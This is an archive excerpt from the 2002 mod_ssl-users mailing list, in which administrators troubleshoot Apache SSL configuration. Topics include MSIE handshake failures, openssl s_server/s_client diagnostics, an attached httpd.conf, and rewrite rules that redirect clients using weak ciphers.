Content-ID: Content-Description: Content-Disposition: attachment; filename="httpd.conf" Content-Transfer-Encoding: BASE64 IyMjIyMjIyMjIyNEU08gTW9kdWxlcyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBM b2FkTW9kdWxlIGZvb19tb2R1bGUgbW9kdWxlcy9tb2RfZm9vLnNvDQoNCg0K DQojIyMjIyMjIyMjI1NlcnZlciBXaWRlIENvbmZpZyMjIyMjIyMjIw0KU2Vy dmVyUm9vdCAiL2hvbWVzL2xhdXJpZS9iaW4vYXBhY2hlMiINClBpZEZpbGUg bG9ncy9odHRwZC5waWQNClRpbWVvdXQgMzAwDQpMaXN0ZW4gODA4MA0KTGlz dGVuIDQ0Mw0KDQpVc2VyIGxhdXJpZQ0KDQpLZWVwQWxpdmUgT24NCk1heEtl ZXBBbGl2ZVJlcXVlc3RzIDEwMA0KS2VlcEFsaXZlVGltZW91dCAxNQ0KQnJv d3Nlck1hdGNoICJNb3ppbGxhLzIiIG5va2VlcGFsaXZlDQpCcm93c2VyTWF0 Y2ggIk1TSUUgNFwuMGIyOyIgbm9rZWVwYWxpdmUgZG93bmdyYWRlLTEuMCBm b3JjZS1yZXNwb25zZS0xLjANCg0KDQo8SWZNb2R1bGUgcHJlZm9yay5jPg0K U3RhcnRTZXJ2ZXJzICAgICAgICAgNQ0KTWluU3BhcmVTZXJ2ZXJzICAgICAg NQ0KTWF4U3BhcmVTZXJ2ZXJzICAgICAxMA0KTWF4Q2xpZW50cyAgICAgICAg IDE1MA0KTWF4UmVxdWVzdHNQZXJDaGlsZCAgMA0KPC9JZk1vZHVsZT4NCg0K PElmTW9kdWxlIHRocmVhZGVkLmM+DQpTdGFydFNlcnZlcnMgICAgICAgICAz DQpNYXhDbGllbnRzICAgICAgICAgMTUwDQpNaW5TcGFyZVRocmVhZHMgICAg IDI1DQpNYXhTcGFyZVRocmVhZHMgICAgIDc1IA0KVGhyZWFkc1BlckNoaWxk ICAgICAyNQ0KTWF4UmVxdWVzdHNQZXJDaGlsZCAgMA0KPC9JZk1vZHVsZT4N Cg0KDQojIyMjIyMjIyNEZWZhdWx0IFNlcnZlciBDb25maWcNClNlcnZlckFk bWluIGljZW5pQGxlc2MuaWMuYWMudWsNCkRvY3VtZW50Um9vdCAiL2hvbWVz L2xhdXJpZS9iaW4vYXBhY2hlMi9odGRvY3MiDQoNCkRpcmVjdG9yeUluZGV4 IGluZGV4Lmh0bWwNCg0KVHlwZXNDb25maWcgY29uZi9taW1lLnR5cGVzDQpE ZWZhdWx0VHlwZSB0ZXh0L3BsYWluDQo8SWZNb2R1bGUgbW9kX21pbWVfbWFn aWMuYz4NCiAgICBNSU1FTWFnaWNGaWxlIGNvbmYvbWFnaWMNCjwvSWZNb2R1 bGU+DQoNCkVycm9yTG9nIGxvZ3MvZXJyb3JfbG9nDQpMb2dMZXZlbCB3YXJu DQpMb2dGb3JtYXQgIiVoICVsICV1ICV0IFwiJXJcIiAlPnMgJWIgXCIle1Jl ZmVyZXJ9aVwiIFwiJXtVc2VyLUFnZW50fWlcIiIgY29tYmluZWQNCkxvZ0Zv cm1hdCAiJWggJWwgJXUgJXQgXCIlclwiICU+cyAlYiIgY29tbW9uDQpMb2dG b3JtYXQgIiV7UmVmZXJlcn1pIC0+ICVVIiByZWZlcmVyDQpMb2dGb3JtYXQg IiV7VXNlci1hZ2VudH1pIiBhZ2VudA0KQ3VzdG9tTG9nIGxvZ3MvYWNjZXNz X2xvZyBjb21iaW5lZA0KDQo8RGlyZWN0b3J5IC8+DQogICAgT3B0aW9ucyBG b2xsb3dTeW1MaW5rcw0KICAgIEFsbG93T3ZlcnJpZGUgTm9uZQ0KICAgIERp cmVjdG9yeUluZGV4IGluZGV4Lmh0bWwJDQogICAgT3JkZXIgYWxsb3csZGVu eQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0RpcmVjdG9yeT4NCg0KQWxpYXMg L21hbnVhbCAiL2hvbWVzL2xhdXJpZS9iaW4vYXBhY2hlMi9tYW51YWwiDQoN CjxEaXJlY3RvcnkgIi9ob21lcy9sYXVyaWUvYmluL2FwYWNoZTIvbWFudWFs Ij4NCiAgICBPcHRpb25zIEluZGV4ZXMgRm9sbG93U3ltTGlua3MgTXVsdGlW aWV3cw0KICAgIEFsbG93T3ZlcnJpZGUgTm9uZQ0KICAgIE9yZGVyIGFsbG93 LGRlbnkNCiAgICBBbGxvdyBmcm9tIGFsbA0KPC9EaXJlY3Rvcnk+DQoNCg0K DQoNCjxWaXJ0dWFsSG9zdCAxNDYuMTY5LjQuMTM6NDQzPg0KRG9jdW1lbnRS b290IC9ob21lcy9sYXVyaWUvYmluL2FwYWNoZTIvc3NsZG9jcw0KU2VydmVy TmFtZSBzdG9uZS5kb2MuaWMuYWMudWsNClNlcnZlckFkbWluIGxhdXJpZUBk b2MuaWMuYWMudWsNCkVycm9yTG9nIC9ob21lcy9sYXVyaWUvYmluL2FwYWNo ZTIvbG9ncy9zc2xfZXJyb3JfbG9nDQpDdXN0b21Mb2cgbG9ncy9zc2xfYWNj ZXNzX2xvZyBjb21iaW5lZA0KDQpTU0xFbmdpbmUgb24NClNTTFByb3RvY29s IGFsbA0KU1NMQ2VydGlmaWNhdGVGaWxlIC9ob21lcy9sYXVyaWUvYmluL2Fw YWNoZTIva2V5cy9zZXJ2ZXIuY3J0DQpTU0xDZXJ0aWZpY2F0ZUtleUZpbGUg L2hvbWVzL2xhdXJpZS9iaW4vYXBhY2hlMi9rZXlzL3NlcnZlci5rZXkNCjwv VmlydHVhbEhvc3Q+DQoNCg0KDQoNCg0KDQoNCg0K --8323328-1968139823-1011628917=:6086-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 21 17:36:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA04533; Mon, 21 Jan 2002 17:35:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from server.cartmanager.net id RAA04506; Mon, 21 Jan 2002 17:34:07 +0100 (MET) Received: from Jason (dhcp120.cartmanager.net [207.173.85.120]) by server.cartmanager.net (8.11.6/8.11.6) with ESMTP id g0LGU9T17338 for ; Mon, 21 Jan 2002 09:30:09 -0700 Message-ID: <018301c1a299$70f3b3c0$7855adcf@Jason> From: "Jason" To: References: <4.3.2.7.2.20020117203440.033d3c00@130.94.22.245> <4.3.2.7.2.20020118223852.00c46520@opal.he.net> Subject: Re: Re[3]: MSIE + "The page cannot be displayed" error Date: Mon, 21 Jan 2002 09:29:30 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jason" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users The URL you would want to go to would be https://www.yourdomainname.com:4433 obviously you would replace yourdomainname.... PS... if you have a firewall in effect, you may have to open port 4433 to allow the connection to succeed. ----- Original Message ----- From: "Christopher Taranto" To: Sent: Friday, January 18, 2002 11:49 PM Subject: Re[3]: MSIE + "The page cannot be displayed" error > > I'm not really sure what to do or what exactly I am expecting using > s_server but here are the results from my server. > > ]# openssl s_server -accept 4443 -www \ > -cert /usr/local/apache/conf/ssl.crt/www.cert.crt \ > -key /usr/local/apache/conf/ssl.key/www.cert.key \ > -state > -debug > Using default temp DH parameters > ACCEPT > > it waits for input, but no matter what I enter it just hangs. I have > looked through the man page but I haven't found an example of how this is > used so I don't quite get it. What should I look for? > > >>To date, I haven't found a machine that is afflicted with the problem > that I can do this with :( > > What's your URL? I will look at your page and see if it works with my > broken MSIE browser. > > > At 10:51 AM 1/18/02 -0700, you wrote: > >Run this command line and try to connect to it. > >openssl s_server -accept 4443 -www -cert pathtocert -key pathtokey -state > > > >1) Make sure to change "pathtocert" and "pathtokey" to the appropriate > >values, and for additional debug info add -debug... > >2) Try to make sure you are using the same openssl that you compiled > >apache with > > > >It simply creates a weblike version of SSL on port 4433 WITHOUT apache > >that will print some debug info to the client.... feel free > >to "man s_server" to get info about the program > > > >At least this way, you will be able to find out if the problem is with > >SSL, or if it with (mod_ssl+apache) > > > >PS... please let me know as I am confronted with the EXACT problem you > >have, and have been for 3 years... even after a full Linux > >redhat upgrade to 7.2 (complete reformat, re-install) > > > >To date, I haven't found a machine that is afflicted with the problem that > >I can do this with :( > > > >----- Original Message ----- > >From: "Christopher Taranto" > >To: > >Sent: Thursday, January 17, 2002 11:10 PM > >Subject: RE: MSIE + "The page cannot be displayed" error > > > > > > > Hi, > > > > > > I have been trying to fix the known MSIE browser issues in my configuration > > > with some issues still occuring. > > > > > > I have read the FAQ, searched the archives, and implemented the solutions > > > that have been documented - but I am still getting the dreaded "The page > > > cannot be displayed" error when certain MSIE browsers attempt to connect to > > > my site. I get the infamous log entry: > > > > > > [Fri Jan 18 00:55:53 2002] [error] mod_ssl: SSL handshake interrupted by > > > system [Hint: Stop button pressed in browser?!] (System error follows) > > > [Fri Jan 18 00:55:53 2002] [error] System: Connection reset by peer > > > (errno: 104) > > > > > > Fortunately (for my sanity), I have one of non-working versions of the MSIE > > > browsers (5.00.2614.3500) on one of the machines in my office so I can > > > repeatedly create the errors. > > > > > > I am determined to squash this thing but I do not know where to go next. > > > > > > I have included the following information below: > > > > > > * SYSTEM INFORMATION > > > * CONFIGURATION INFORMATION > > > * BROWSER VERSION INFORMATION > > > * CERTIFICATE STATISTICS FROM THE BROWSER > > > > > > Any help or further direction would be greatly appreciated! > > > > > > Sincerely, > > > > > > Christopher Taranto > > > > > > > > > SYSTEM INFORMATION: > > > =================== > > > > > > I am running Red Hat 6.2 on a Pentinum III using: > > > > > > * mod_ssl-2.8.5-1.3.22 > > > * openssl-0.9.6b > > > * mm-1.1.3 > > > > > > > > > CONFIGURATION INFORMATION: > > > ========================== > > > > > > > > > > > > AddType application/x-x509-ca-cert .crt > > > AddType application/x-pkcs7-crl .crl > > > > > > SSLPassPhraseDialog builtin > > > > > > # I have also tried dbm but there was no difference > > > SSLSessionCache > > > shm:/usr/local/apache/logs/ssl_gcache_data(512000) > > > SSLSessionCacheTimeout 300 > > > > > > SSLMutex file:logs/ssl_mutex > > > > > > SSLRandomSeed startup builtin > > > SSLRandomSeed connect builtin > > > > > > SSLLog logs/ssl_engine_log > > > SSLLogLevel info > > > > > > > > > > > > > > > > > > > > > > > > SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP > > > > > > BrowserMatch "MSIE [1-4]" nokeepalive \ > > > ssl-unclean-shutdown \ > > > downgrade-1.0 \ > > > force-response-1.0 > > > > > > BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown > > > > > > BrowserMatch "Mozilla/4..*PC)" nokeepalive \ > > > downgrade-1.0 \ > > > force-response-1.0 > > > > > > > > > > > > > > > > > > > > > BROWSER VERSION INFORMATION > > > =================================== > > > > > > MSIE 5.00.2614.3500 > > > Cipher Strength: 40-bit > > > > > > > > > CERTIFICATE STATS FROM THE BROWSER > > > =================================== > > > > > > My certificate was generated using 1024 bits. > > > > > > Version: V3 > > > Serial Number: 5A55 3FAD EB43 6649 7F8B 39BB 1D33 6DE1 > > > Signature Algorithm: md5RSA > > > Public Key: 3081 8902 8181 00BD D63A 500D 0FE0 CCA2 E7BB 804B 53DA E4CE > > > 9F51 3D54 93A3 5D2E FC0E E3E2 7046 1EFF 6826 BB30 B8DC 4903 9A32 345F E769 > > > 31D7 D313 6ECD 62BD 2CBE C070 AFD5 C1C8 9920 7442 5E44 2AED 7878 A566 DD3A > > > 3445 0612 919A 0B74 2F6A E806 080F C7E7 9C68 7FAC 51D3 4EA9 0BC3 ABAF 27D2 > > > 2C95 0A09 CD12 61B3 4DF2 0A88 1379 7552 5B1C D4CE 9F02 0301 0001 > > > Basic Constraints: Subject Type=End Entity > > > Path Length Constraint=None > > > Key Usage: Digital Signature, Key Encipherment(A0) > > > > > > [1]CRL Distribution Point > > > Distribution Point Name: > > > Full Name: > > > URL=http://crl.verisign.com/RSASecureServer.crl > > > > > > [1]Certificate Policy: > > > PolicyIdentifier=2.16.840.1.113733.1.7.1.1 > > > [1,1]Policy Qualifier Info: > > > Policy Qualifier Id=1.3.6.1.5.5.7.2.1 > > > Qualifier=161C 6874 7470 733A 2F2F 7777 772E 7665 7269 7369 676E > > > 2E63 6F6D 2F43 5053 > > > [1,2]Policy Qualifier Info: > > > Policy Qualifier Id=1.3.6.1.5.5.7.2.2 > > > Qualifier=3056 3015 160E 5665 7269 5369 676E 2C20 496E 632E 3003 > > > 0201 011A 3D56 6572 6953 6967 6E27 7320 4350 5320 696E 636F 7270 2E20 6279 > > > 2072 6566 6572 656E 6365 206C 6961 622E 206C 7464 2E20 2863 2939 3720 5665 > > > 7269 5369 676E > > > > > > Server Authentication(1.3.6.1.5.5.7.3.1) > > > Client Authentication(1.3.6.1.5.5.7.3.2) > > > > > > 2.16.840.1.113733.1.6.15: > > > 16 09 39 32 36 30 32 32 ..926022 > > > 34 32 37 427 > > > > > > Authority Information Access: [1]Authority Info Access > > > AccessMethod=On-line Certificate Status Protocol(1.3.6.1.5.5.7.48.1) > > > Alternative Name: > > > URL=http://ocsp.verisign.com > > > > > > Thumbprint Algorithm: sha1 > > > Thumbprint: CC1C DD7D BE05 C813 F119 813B 86E6 5717 5583 F981 > > > > > > > > > > > > > > > > > > > > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > > User Support Mailing List modssl-users@modssl.org > > > Automated List Manager majordomo@modssl.org > > > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 21 18:59:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA09152; Mon, 21 Jan 2002 18:58:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id SAA09119; Mon, 21 Jan 2002 18:57:36 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g0LHvZE2459777 for modssl-users@modssl.org; Mon, 21 Jan 2002 18:57:35 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa09KFt; Mon Jan 21 18:57:27 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id SAA19537 for ; Mon, 21 Jan 2002 18:56:45 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id SAA84608 for modssl-users@modssl.org; Mon, 21 Jan 2002 18:49:18 +0100 (MET) Date: Mon, 21 Jan 2002 18:49:18 +0100 From: Thomas Binder To: modssl-users@modssl.org Subject: Re: ensure 128 bit encryption Message-ID: <20020121184917.A6497449@ohm.arago.de> Mail-Followup-To: modssl-users@modssl.org References: <28346.1011372586@www21.gmx.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <28346.1011372586@www21.gmx.net>; from hekiman@gmx.at on Fri, Jan 18, 2002 at 05:49:46PM +0100 Organization: arago GmbH Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Fri, Jan 18, 2002 at 05:49:46PM +0100, hekiman@gmx.at wrote: > > SSLRequireSSL > > SSLRequire ( %{SSL_CIPHER_USEKEYSIZE} >= 128 ) > > with this option, the user gets no https connection if he has < > 128 bit. but the user should get a error page. so it must be > possible to establish a connection with <128 bit but redirected > to the error page. Try the following (inside ...127 won't work as expected. Maybe someone else knows an elegant solution. Ciao Thomas -- I should have been a country-western singer. After all, I'm older than most western countries. -- George Burns ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 21 19:11:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA10242; Mon, 21 Jan 2002 19:10:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id TAA10203; Mon, 21 Jan 2002 19:09:21 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g0LI9HT2424905 for modssl-users@modssl.org; Mon, 21 Jan 2002 19:09:17 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa09PKz; Mon Jan 21 19:09:10 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id TAA20670 for ; Mon, 21 Jan 2002 19:08:28 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id TAA41808 for modssl-users@modssl.org; Mon, 21 Jan 2002 19:01:01 +0100 (MET) Date: Mon, 21 Jan 2002 19:01:01 +0100 From: Thomas Binder To: modssl-users@modssl.org Subject: Re: ensure 128 bit encryption Message-ID: <20020121190100.B6497449@ohm.arago.de> Mail-Followup-To: modssl-users@modssl.org References: <28346.1011372586@www21.gmx.net> <20020121184917.A6497449@ohm.arago.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020121184917.A6497449@ohm.arago.de>; from gryf@arago.de on Mon, Jan 21, 2002 at 06:49:18PM +0100 Organization: arago GmbH Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Mon, Jan 21, 2002 at 06:49:18PM +0100, Thomas Binder wrote: > SSLOptions +StdEnvVars > RewriteBase absolute-filesystem-path-to-directory > RewriteCond %{ENV:SSL_CIPHER_EXPORT} "^true$" > RewriteRule ".*" /noexport.html An addition: You also need RewriteEngine On Ciao Thomas -- It is far more impressive when others discover your good qualities without your help. -- Miss Manners ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 21 19:33:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA11285; Mon, 21 Jan 2002 19:32:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA11281; Mon, 21 Jan 2002 19:32:03 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id A4EA74CE63B; Mon, 21 Jan 2002 19:32:03 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0LIVmx60609; Mon, 21 Jan 2002 19:31:48 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id QAA01683; Mon, 21 Jan 2002 16:22:08 +0100 (MET) Date: Mon, 21 Jan 2002 16:22:08 +0100 (MET) Message-Id: <200201211522.QAA01683@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] bug (PR#661) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Jan 21, 2002 at 08:02:06AM +0100, modssl-bugdb@modssl.org wrote: > When I try to connect to my apache(1.3.12) mod_ssl server (mod_ssl-2.6.1) > using Internet Explorer 5 running on Win98/95/WinNT 4.0 I get a "page > not found error", just after accepting the (test) certificate I > requested created through openssl(0.9.5).once the certificate is installed, if > i'll access the page three to four times it opens the page.can u help me out. > Check your error_log - also keep in mind that you shouldn't really expect MSIE error messages to be anywhere near corret. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 21 19:34:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA11323; Mon, 21 Jan 2002 19:33:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from atlrel6.hp.com id TAA11314; Mon, 21 Jan 2002 19:32:50 +0100 (MET) Received: from xatlrelay1.atl.hp.com (xatlrelay1.atl.hp.com [15.45.89.190]) by atlrel6.hp.com (Postfix) with ESMTP id CB1966011FF for ; Mon, 21 Jan 2002 13:32:37 -0500 (EST) Received: from xatlbh1.atl.hp.com (xatlbh1.atl.hp.com [15.45.89.186]) by xatlrelay1.atl.hp.com (Postfix) with ESMTP id 920B320014A for ; Mon, 21 Jan 2002 13:32:37 -0500 (EST) Received: by xatlbh1.atl.hp.com with Internet Mail Service (5.5.2653.19) id ; Mon, 21 Jan 2002 13:32:37 -0500 Message-ID: From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" To: "'modssl-users@modssl.org'" Subject: RE: Apache 2 + SSL Problems Date: Mon, 21 Jan 2002 13:32:36 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Laurie, What version of Apache 2.0 / what platform are you using ??.. Also, did you run into any compilation issues ?.. -Madhu -----Original Message----- From: Laurie Young [mailto:laurie@wildfalcon.com] Sent: Monday, January 21, 2002 8:02 AM To: modssl-users@modssl.org Subject: Apache 2 + SSL Problems Hi, I'm trying to get Apache 2 to work with SSL to set up an https server. I presume I am getting something wrong. When I try to access the site the connection times out and I get: [Mon Jan21 12:53:11 2002] [error] [client 127.0.0.1] Invalid method in request written to the log file I have attached a copy of my http.conf file -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 10:20:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA19685; Tue, 22 Jan 2002 10:19:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id KAA19628; Tue, 22 Jan 2002 10:18:23 +0100 (MET) Received: (qmail 7190 invoked by uid 500); 22 Jan 2002 10:19:05 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Jan 2002 10:19:05 -0000 Date: Tue, 22 Jan 2002 10:19:05 +0000 (GMT) From: Laurie Young To: "'modssl-users@modssl.org'" Subject: RE: Apache 2 + SSL Problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Its running with on a SuSE Linux install Apapche 2.0.28 ModSSL compiled into apache No problems with compilation (though I had problems getting modssl to compile as a DSO I had no problems compiling it into the main binary) If I try and connect with openssl to see whats going on I get: [laurie@stone src]$ openssl s_client -connect localhost:443 -state -debug CONNECTED(00000003) SSL_connect:before/connect initialization write to 0814B5A0 [0814B5E8] (130 bytes => 130 (0x82)) 0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00 ......W... ..... 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05 .........f...... 0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00 ................ 0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00 .e..d..c..b..a.. 0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14 `...........@... 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ 0060 - 00 80 08 92 0d f4 b5 83-60 ae 0b fb 3b 92 08 79 ........`...;..y 0070 - 92 79 cf 8c c6 57 64 72-96 4c 0d 63 8d 1f 71 7f .y...Wdr.L.c..q. 0080 - 62 e3 b. SSL_connect:SSLv2/v3 write client hello A read from 0814B5A0 [08150B48] (7 bytes => 7 (0x7)) 0000 - 3c 21 44 4f 43 54 59 Laurie, > What version of Apache 2.0 / what platform are you using ??.. Also, > did you run into any compilation issues ?.. > > -Madhu > > -----Original Message----- > From: Laurie Young [mailto:laurie@wildfalcon.com] > Sent: Monday, January 21, 2002 8:02 AM > To: modssl-users@modssl.org > Subject: Apache 2 + SSL Problems > > > Hi, > > I'm trying to get Apache 2 to work with SSL to set up an https server. I > presume I am getting something wrong. > > When I try to access the site the connection times out and I get: > [Mon Jan21 12:53:11 2002] [error] [client 127.0.0.1] Invalid method in > request > written to the log file > > I have attached a copy of my http.conf file > > > > > -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 10:33:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA20278; Tue, 22 Jan 2002 10:32:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from antares.gecadsoftware.com id KAA20264; Tue, 22 Jan 2002 10:32:02 +0100 (MET) Received: (qmail 17202 invoked from network); 22 Jan 2002 09:40:25 -0000 Received: from unknown (HELO taz.gecadsoftware.com) (193.230.245.17) by antares.gecadsoftware.com with SMTP; 22 Jan 2002 09:40:24 -0000 Received: from teo.gecadsoftware.com ([193.230.245.169]) by taz.gecadsoftware.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id DFRCTT30; Tue, 22 Jan 2002 11:30:33 +0200 Received: by teo.gecadsoftware.com (Postfix, from userid 501) id 200651DEC3; Tue, 22 Jan 2002 11:28:51 +0200 (EET) Date: Tue, 22 Jan 2002 11:28:51 +0200 From: Teodor Cimpoesu To: "'modssl-users@modssl.org'" Subject: Re: Apache 2 + SSL Problems Message-ID: <20020122112851.I5424@gecadsoftware.com> Mail-Followup-To: Teodor Cimpoesu , "'modssl-users@modssl.org'" References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.21i Organization: GeCAD Software (http://www.gecadsoftware.com) Comment: Worry less, RAV is watching! X-Operating-System: Linux 2.4.8-26mdk i686 up 15:00 X-Mailer: Mutt, man's best friend (http://www.mutt.org) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Teodor Cimpoesu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Laurie! On Tue, 22 Jan 2002, Laurie Young wrote: > Hi > > Its running with on a SuSE Linux install > Apapche 2.0.28 > ModSSL compiled into apache > No problems with compilation (though I had problems getting modssl to > compile as a DSO I had no problems compiling it into the main binary) > > If I try and connect with openssl to see whats going on I get: > [laurie@stone src]$ openssl s_client -connect localhost:443 -state -debug > CONNECTED(00000003) > SSL_connect:before/connect initialization > write to 0814B5A0 [0814B5E8] (130 bytes => 130 (0x82)) > 0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00 ......W... ..... > 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05 .........f...... > 0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00 ................ > 0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00 .e..d..c..b..a.. > 0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14 `...........@... > 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ > 0060 - 00 80 08 92 0d f4 b5 83-60 ae 0b fb 3b 92 08 79 ........`...;..y > 0070 - 92 79 cf 8c c6 57 64 72-96 4c 0d 63 8d 1f 71 7f .y...Wdr.L.c..q. > 0080 - 62 e3 b. > SSL_connect:SSLv2/v3 write client hello A > read from 0814B5A0 [08150B48] (7 bytes => 7 (0x7)) > 0000 - 3c 21 44 4f 43 54 59 SSL_connect:error in SSLv2/v3 read server hello A > 11506:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown > protocol:s23_clnt.c:460: > > > Any ideas? > > Laurie > > -- teodor 